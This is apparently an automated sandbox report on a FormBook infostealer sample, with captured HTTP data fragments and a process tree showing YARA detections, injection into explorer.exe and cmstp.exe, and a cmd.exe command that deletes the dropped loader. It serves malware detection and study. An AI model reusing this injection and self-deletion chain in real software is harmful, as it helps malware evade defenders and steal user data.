                                                                    2021-10-27 14:29:02 UTC47INData Raw: 2e 73 72 63 3d 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 6c 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 6c 3f 61 2e 67 3a 22 74 79 70 65 5f 65 72 72 6f 72 3a 54 72 75 73 74 65 64 52 65 73 6f 75 72 63 65 55 72 6c 22 3b 76 61 72 20 64 3b 61 3d 28 63 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 26 26 63 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 7c 7c 77 69 6e 64 6f 77 29 2e 64 6f 63 75 6d 65 6e 74 3b 28 64 3d 28 62 3d 6e 75 6c 6c 3d 3d 3d 28 64 3d 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 61 2c 22 73 63 72 69 70 74 5b 6e 6f 6e 63 65 5d 22 29 29 3f 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63
                                                                    Data Ascii: .src=a instanceof l&&a.constructor===l?a.g:"type_error:TrustedResourceUrl";var d;a=(c.ownerDocument&&c.ownerDocument.defaultView||window).document;(d=(b=null===(d=a.querySelector)||void 0===d?void 0:d.call(a,"script[nonce]"))?b.nonce||b.getAttribute("nonc
                                                                    2021-10-27 14:29:02 UTC48INData Raw: 5c 5c 78 32 32 2f 68 69 73 74 6f 72 79 5c 5c 5c 78 32 32 5c 5c 75 30 30 33 45 57 65 62 20 48 69 73 74 6f 72 79 5c 5c 75 30 30 33 43 2f 61 5c 5c 75 30 30 33 45 5c 78 32 32 2c 5c 78 32 32 70 73 72 6c 5c 78 32 32 3a 5c 78 32 32 52 65 6d 6f 76 65 5c 78 32 32 2c 5c 78 32 32 73 62 69 74 5c 78 32 32 3a 5c 78 32 32 53 65 61 72 63 68 20 62 79 20 69 6d 61 67 65 5c 78 32 32 2c 5c 78 32 32 73 72 63 68 5c 78 32 32 3a 5c 78 32 32 47 6f 6f 67 6c 65 20 53 65 61 72 63 68 5c 78 32 32 7d 2c 5c 78 32 32 6f 76 72 5c 78 32 32 3a 7b 7d 2c 5c 78 32 32 70 71 5c 78 32 32 3a 5c 78 32 32 5c 78 32 32 2c 5c 78 32 32 72 65 66 70 64 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 72 66 73 5c 78 32 32 3a 5b 5d 2c 5c 78 32 32 73 62 61 73 5c 78 32 32 3a 5c 78 32 32 30 20 33 70 78 20 38 70 78 20
                                                                    Data Ascii: \\x22/history\\\x22\\u003EWeb History\\u003C/a\\u003E\x22,\x22psrl\x22:\x22Remove\x22,\x22sbit\x22:\x22Search by image\x22,\x22srch\x22:\x22Google Search\x22},\x22ovr\x22:{},\x22pq\x22:\x22\x22,\x22refpd\x22:true,\x22rfs\x22:[],\x22sbas\x22:\x220 3px 8px
                                                                    2021-10-27 14:29:02 UTC48INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    Analysis Process: 583475.exe PID: 5816 Parent PID: 6480

                                                                    General

                                                                    Start time:16:28:59
                                                                    Start date:27/10/2021
                                                                    Path:C:\Users\user\Desktop\583475.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\583475.exe'
                                                                    Imagebase:0x840000
                                                                    File size:1085952 bytes
                                                                    MD5 hash:721356BFA1F8C23D40F6B2FF77B55DB0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    Analysis Process: AddInProcess32.exe PID: 5540 Parent PID: 5816

                                                                    General

                                                                    Start time:16:29:36
                                                                    Start date:27/10/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                    Imagebase:0x890000
                                                                    File size:42080 bytes
                                                                    MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus matches:
                                                                    • Detection: 0%, Metadefender, Browse
                                                                    • Detection: 0%, ReversingLabs
                                                                    Reputation:moderate

                                                                    Analysis Process: explorer.exe PID: 3424 Parent PID: 5540

                                                                    General

                                                                    Start time:16:29:41
                                                                    Start date:27/10/2021
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                    Imagebase:0x7ff6fee60000
                                                                    File size:3933184 bytes
                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:high

                                                                    Analysis Process: autofmt.exe PID: 4720 Parent PID: 5540

                                                                    General

                                                                    Start time:16:30:18
                                                                    Start date:27/10/2021
                                                                    Path:C:\Windows\SysWOW64\autofmt.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                    Imagebase:0x820000
                                                                    File size:831488 bytes
                                                                    MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    Analysis Process: cmstp.exe PID: 7120 Parent PID: 5540

                                                                    General

                                                                    Start time:16:30:20
                                                                    Start date:27/10/2021
                                                                    Path:C:\Windows\SysWOW64\cmstp.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                                    Imagebase:0x9d0000
                                                                    File size:82944 bytes
                                                                    MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:moderate

                                                                    Analysis Process: cmd.exe PID: 5216 Parent PID: 7120

                                                                    General

                                                                    Start time:16:30:23
                                                                    Start date:27/10/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
                                                                    Imagebase:0x11d0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Analysis Process: conhost.exe PID: 5620 Parent PID: 5216

                                                                    General

                                                                    Start time:16:30:24
                                                                    Start date:27/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >